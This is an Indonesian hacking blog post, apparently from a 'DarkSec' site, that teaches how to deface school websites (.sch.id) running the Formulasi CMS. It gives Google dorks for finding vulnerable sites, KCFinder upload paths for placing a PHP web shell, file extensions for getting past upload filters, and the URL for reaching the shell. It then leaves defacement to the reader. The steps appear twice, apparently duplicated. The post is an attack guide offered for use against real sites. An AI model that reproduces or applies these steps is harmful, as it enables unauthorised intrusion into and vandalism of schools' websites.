Halo sobat DarkSec kali ini saya mau share tutorial cara deface dengan cms formulasi.
Ini cara kedua untuk deface situs sekolah selain cara balitbang.
1. Dorking target di google search engine
2. Cari situs yang masih vuln, Biar bisa diupload shell
3. Masukkan exploit
contoh : http://site.sch.id/[path]/adminpanel/ckeditor/kcfinder/browse.php
4. Upload shell kalian dengan ext yang diatas tadi kalo masih gak bisa ya kalian perbanyak ngaca lagi deh hehehe
5. Kalo sukses terupload, tinggal akses shellnya. Masukkan exploit ini
http://site.sch.id/[path]images/files/namashell.php
6. Kalo udah kebuka aksesnya, terserah kalian mau diapain. ditebas? Silahkan tapi jangan salahkan saya ya hehe sebaiknya backup dulu indexnya, Hargai adminnya gan dia sudah susah payah membuat website dan kamu mau merusaknya begitu saja?:D
oke sekian tutor dari saya, selamat beraktivitas.
Ini cara kedua untuk deface situs sekolah selain cara balitbang.
Bahan-bahan
- Dork (Sudah saya siapin dibawah )
- Exploit (ada dibawah gan )
- Shell ber ext .php5 .php.xxxjpg .php.fla
- Siapkan kesabaran Anda
Dork
- inurl:data-link- site:sch.id
- inurl:/?p=detberita&id=
- powered by Formulasi Free Opensource CMS
Exploit
- Adminpanel/ckeditor/kcfinder/browse.php
- Adminpanel/ckeditor/kcfinder/upload.php
1. Dorking target di google search engine
2. Cari situs yang masih vuln, Biar bisa diupload shell
3. Masukkan exploit
contoh : http://site.sch.id/[path]/adminpanel/ckeditor/kcfinder/browse.php
4. Upload shell kalian dengan ext yang diatas tadi kalo masih gak bisa ya kalian perbanyak ngaca lagi deh hehehe
5. Kalo sukses terupload, tinggal akses shellnya. Masukkan exploit ini
http://site.sch.id/[path]images/files/namashell.php
6. Kalo udah kebuka aksesnya, terserah kalian mau diapain. ditebas? Silahkan tapi jangan salahkan saya ya hehe sebaiknya backup dulu indexnya, Hargai adminnya gan dia sudah susah payah membuat website dan kamu mau merusaknya begitu saja?:D
oke sekian tutor dari saya, selamat beraktivitas.

No comments:
Post a Comment
Berkomentarlah dengan sopan